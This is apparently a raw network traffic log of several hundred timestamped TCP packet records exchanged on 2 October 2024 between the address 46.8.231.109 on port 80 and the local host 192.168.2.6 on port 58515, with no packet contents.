                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615721941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615736961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615746975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615758896 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615761995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615773916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615781069 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615784883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615808010 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615822077 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615869045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615880966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615891933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615902901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615910053 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615923882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615926981 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615950108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.615969896 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695544004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695594072 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695597887 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695611000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695631981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695636034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695647001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695651054 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695661068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695672035 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695672989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695686102 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695698977 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695717096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695755959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695766926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695777893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695787907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695789099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695811033 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695821047 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695835114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695848942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695859909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695877075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.695895910 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696197033 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696209908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696222067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696233034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696248055 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696269035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696269989 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696281910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696293116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696300983 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696305037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696320057 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696330070 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696340084 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696346045 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696351051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696382999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696410894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696422100 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696433067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696444035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696455956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696458101 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696468115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696490049 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.696499109 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697083950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697096109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697107077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697124958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697129011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697137117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697151899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697164059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697164059 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697190046 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697204113 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697207928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697228909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697240114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697261095 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697290897 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697303057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697309971 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697316885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697330952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697334051 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697356939 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697380066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697380066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697393894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697422981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697433949 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697438955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697446108 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697458029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697463036 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697483063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697503090 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697518110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697529078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697539091 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697551966 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697566032 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.697582960 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700428963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700440884 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700479031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700489998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700503111 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700512886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700536966 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700558901 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700602055 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700615883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700625896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700649023 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700664043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700862885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700875044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700886011 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700898886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700911045 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700928926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700932980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700944901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700954914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700965881 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700965881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700978994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700984955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.700999022 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701029062 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701881886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701925039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701946020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701958895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701968908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701981068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.701993942 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702008009 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702039003 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702054024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702065945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702071905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702075958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702089071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702104092 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702107906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702117920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702117920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702130079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702151060 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702158928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702162981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702177048 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702200890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702229023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702240944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702251911 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702275038 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702292919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702296972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702349901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702364922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702388048 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702402115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702408075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702414989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702425003 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702444077 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702465057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702466011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702477932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702497959 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702514887 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.702980995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703015089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703023911 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703036070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703064919 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703080893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703082085 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703094959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703107119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703118086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703128099 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703154087 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703186989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703197956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703208923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703219891 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703224897 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703232050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703243971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703243971 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703269005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703282118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703298092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703310013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703342915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703399897 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703412056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703423023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703433037 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703433990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703459978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703480959 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703510046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703521013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703531981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703542948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703552961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703556061 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703566074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703577042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703587055 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703588963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703609943 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703634024 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703640938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703651905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703663111 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703687906 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.703707933 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.782896996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.782926083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.782937050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.782974005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.782984018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783003092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783010960 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783016920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783030987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783042908 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783067942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783071041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783106089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783106089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783185005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783195972 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783221960 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783237934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783250093 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783250093 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783277035 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783289909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783322096 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783334017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783344984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783358097 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783375978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783396959 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783632040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783643961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783653975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783667088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783679962 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783708096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783770084 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783782005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783809900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783828974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783835888 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783843040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783865929 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.783876896 CEST5851580192.168.2.646.8.231.109
